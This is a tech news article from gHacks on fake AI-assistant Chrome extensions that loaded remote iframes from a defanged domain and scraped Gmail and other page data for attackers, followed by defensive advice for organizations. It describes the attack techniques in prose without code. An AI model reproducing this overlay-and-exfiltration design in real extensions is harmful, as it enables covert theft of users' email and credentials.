We have seen our fair share of malicious Chrome extensions in the past 17 or so years since Google released the initial version of its browser. From fake VPN extensions and outright malicious extensions to sophisticated session replay malware.
This time, more than 260,000 Chrome users unknowingly installed a browser extension labeled as a helpful AI assistant. According to researchers at LayerX, the coordinated campaign involved over 30 fake tools posing as services similar to ChatGPT and Claude.
While marketed as productivity tools, these extensions functioned as a browser-level spy app.
How the Campaign Worked
Researchers discovered that the malicious extensions shared nearly identical code, permissions, and backend infrastructure. Instead of appearing as separate tools with different names and branding, they relied on the same underlying structure.
Security researcher Natalie Zargarov explained that the campaign exploited users’ trust in AI interfaces:
“By injecting iframes that mimic trusted AI interfaces, they’ve created a nearly invisible man-in-the-middle attack that intercepts everything from API keys to personal data before it ever reaches the legitimate service.”
The attack was especially effective because it integrated into normal AI interactions, where users are already getting used to sharing detailed information.
The “AiFrame” Architecture Explained
At the core of the operation was what researchers call an “AiFrame” architecture.
Instead of embedding full functionality inside the extension code reviewed by Google during installation, the extensions:
- Loaded a full-screen iframe from remote domains (e.g., subdomains of tapnetic[.]pro)
- Overlaid the current webpage
- Acted as a fake AI interface
- Pulled instructions dynamically from backend servers
This setup allowed attackers to change behavior remotely without pushing an updated version to the Chrome Web Store. In other words, what users installed wasn’t necessarily what was running later.
Gmail Was a Primary Target
Fifteen of the malicious extensions specifically targeted Gmail users.
These versions:
- Activated at
document_starton mail.google.com - Injected interface elements into Gmail’s interface
- Used MutationObserver scripts to persist within dynamic pages
- Accessed email threads and, in some cases, draft content
- Transmitted extracted data back to remote servers
Because the extensions had <all_urls> permissions, they could also access data across nearly any site a user visited (including enterprise dashboards and SaaS platforms).
Enterprise Risks and Data Exfiltration
The concern extends beyond just simple users. These extensions effectively acted as remotely controlled access brokers.
By combining privileged browser permissions with backend-controlled interfaces, attackers were able to:
- Scrape structured page data using Mozilla’s Readability library
- Extract titles, article text, and metadata
- Capture sensitive enterprise data inside authenticated sessions
- Transmit data outside intended browser security boundaries
The infrastructure behind the campaign relied on themed subdomains under tapnetic[.]pro, with rapid “extension spraying” tactics. When one extension was removed from the Chrome Web Store, nearly identical copies appeared shortly afterward under new identifiers.
Why This Attack Is Different
What makes this campaign different isn’t just scale.
Modern browser extensions have access levels similar to endpoint software. When combined with:
- Automatic updates
- Remote content loading
- Broad site permissions
They become powerful spy mechanisms. Because much of the malicious logic lived remotely, enforcement actions against individual extensions had limited impact.
How Organizations Can Reduce Risk
Security experts recommend a layered defense approach you can implement in your organization today:
1. Restrict Extension Installations
Allow only vetted browser add-ons through enterprise policy controls.
2. Monitor High-Risk Permissions
Flag extensions requesting <all_urls>, cookie access, or content script injection.
3. Monitor Telemetry
Watch for unusual DOM scraping, iframe injection, and suspicious outbound connections.
4. Enforce Network Controls
Use DNS filtering, egress monitoring, and data loss prevention (DLP).
5. Strengthen Identity Protections
Implement MFA, device trust policies, and least-privilege access.
6. Audit Regularly
Conduct threat hunting and browser configuration reviews to detect extension spraying.
A Growing AI-Themed Threat
To me, this campaign shows a broader trend: hackers are using the trust and popularity of AI tools to their advantage.
As AI assistants become deeply integrated into daily work, attackers are increasingly mimicking their interfaces to collect sensitive information.
For users and enterprises alike, the lesson is clear:
“Browser extensions deserve the same scrutiny as installed software.”
Thank you for being a Ghacks reader. The post 260,000 Chrome Users Exposed by Fake AI Extensions Targeting Gmail appeared first on gHacks.
